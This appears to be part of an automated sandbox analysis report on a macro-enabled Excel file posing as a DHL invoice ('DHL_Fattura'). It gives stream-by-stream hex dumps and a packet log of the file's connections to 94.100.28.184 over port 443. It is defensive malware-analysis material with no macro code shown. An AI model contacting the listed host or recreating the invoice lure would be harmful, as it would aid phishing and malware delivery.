Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 252

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	252
Entropy:	2.87612345671
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D H L _ F a t t u r a . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 cc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 128

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	128
Entropy:	3.10279303889
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . P . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . . . . . @ . . . . ? . . f . . . @ . . . . . . . f . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 50 00 00 00 04 00 00 00 01 00 00 00 28 00 00 00 0c 00 00 00 30 00 00 00 0d 00 00 00 3c 00 00 00 13 00 00 00 48 00 00 00 02 00 00 00 e4 04 00 00 40 00 00 00 c0 3f 95 ab 66 ae d5 01 40 00 00 00 00 e1 9d ad 66 ae d5 01 03 00 00 00 00 00 00 00

Stream Path: MBD00F5C668/\x1CompObj, File Type: data, Stream Size: 112

General
Stream Path:	MBD00F5C668/\x1CompObj
File Type:	data
Stream Size:	112
Entropy:	4.6011544911
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00F5C668/f, File Type: data, Stream Size: 104

General
Stream Path:	MBD00F5C668/f
File Type:	data
Stream Size:	104
Entropy:	3.78858310721
Base64 Encoded:	False
Data ASCII:	. . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . N o t i f i c a . R . . . . . . . . . . . K . Q . . . . . . . . . . . C a l i b r i . . . . . . . . . .
Data Raw:	00 04 38 00 06 0c 1e 08 0e 00 00 80 0e 00 00 80 03 00 00 00 0f 00 00 80 08 00 00 80 ff ff 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 4e 6f 74 69 66 69 63 61 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 00 00 00 90 01 ac b6 01 00 07 43 61 6c 69 62 72 69 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00F5C668/o, File Type: empty, Stream Size: 0

General
Stream Path:	MBD00F5C668/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 41420

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	41420
Entropy:	6.56002517054
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	524
Entropy:	5.2765368932
Base64 Encoded:	True
Data ASCII:	I D = " { E A 3 B 9 B 5 2 - 9 1 3 2 - 4 D A 8 - 9 A 6 5 - 4 9 C 3 1 E 3 A 1 7 8 0 } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 9 8 B 4 6 5 E 4 A 5 E 4 A 5 E 4 A 5 E 4 A " . . D P B = " 1 2 1 0 D D 5 6 6 7 5 7 6 7 5 7 6 7 " . . G C = " 9 B 9 9
Data Raw:	49 44 3d 22 7b 45 41 33 42 39 42 35 32 2d 39 31 33 32 2d 34 44 41 38 2d 39 41 36 35 2d 34 39 43 33 31 45 33 41 31 37 38 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	104
Entropy:	3.33133492199
Base64 Encoded:	False
Data ASCII:	Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
Data Raw:	51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3474

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3474
Entropy:	4.41475278082
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2125

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2125
Entropy:	3.51184583366
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ R . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . 9 . . . d . F . 2 . . % . . l . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 277

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	277
Entropy:	2.0473166174
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z o o m . . . . . . . . . . . . . . . . S i n a . . . . . . . . . . . . . . . . O k . . . . . . . . . . . . . . . . u n i . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 1110

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	1110
Entropy:	1.98569641412
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . 7 . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 61 0a 00 00 00 00 00 00 00 00 00 00 91 0a 00 00 00 00 00 00 00 00 00 00 c1 0a

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 526

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	526
Entropy:	2.38448714382
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 d1 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 814

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	814
Entropy:	6.45566328336
Base64 Encoded:	True
Data ASCII:	. * . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . _ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 2a b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bc d5 d5 5f 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2019 17:30:25.451663971 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:25.481950045 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:25.482084036 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:25.528983116 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:25.559293985 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:25.566154003 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:25.566307068 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:25.566330910 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:25.566725016 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:25.585969925 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:25.616604090 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:25.847650051 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:25.847773075 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:38.635457993 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:38.705631018 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706712961 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706737995 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706752062 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706763029 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706773043 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706784010 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706794977 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706805944 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706820011 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.706830978 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.707062006 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.707264900 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.737469912 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737499952 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737515926 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737530947 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737654924 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737673998 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737677097 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.737689018 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737703085 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737716913 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737730980 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737745047 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737759113 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737772942 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737787008 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.737833977 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.737946033 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.738905907 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.768119097 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768150091 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768173933 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768187046 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.768197060 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768222094 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768256903 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768312931 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768315077 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.768337011 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768359900 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768384933 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768392086 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.768405914 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768429041 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768465996 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768466949 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.768506050 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.768532991 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.768738985 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.798541069 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798576117 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798646927 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.798799992 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798831940 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798850060 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798868895 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798887968 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798906088 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.798937082 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.798978090 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.799014091 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.799041033 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.799042940 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.799062967 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.799079895 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.799098015 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.799114943 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.799139977 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.799379110 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.829021931 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829056025 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829113960 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.829483986 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829535961 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829581022 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829598904 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.829606056 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829641104 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829660892 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829684019 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829704046 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829724073 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829730988 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.829746008 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829766989 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829788923 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829809904 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.829857111 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.830476046 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.859549046 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.859572887 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.859635115 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.859956980 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860016108 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860071898 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860088110 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860131979 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860131979 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.860146999 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860181093 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860196114 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860210896 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860224962 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860234022 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.860239983 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860255003 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860270023 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860284090 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.860321045 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.889908075 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890059948 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890115023 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.890475035 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890528917 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890541077 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890574932 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.890583992 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890693903 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890739918 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890773058 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.890775919 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890809059 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890846014 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890871048 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.890882015 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890916109 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890944004 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.890952110 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.890984058 CET	443	49220	94.100.28.184	192.168.2.2
Dec 9, 2019 17:30:40.891011000 CET	49220	443	192.168.2.2	94.100.28.184
Dec 9, 2019 17:30:40.920402050 CET	443	49220	94.100.28.184	192.168.2.2
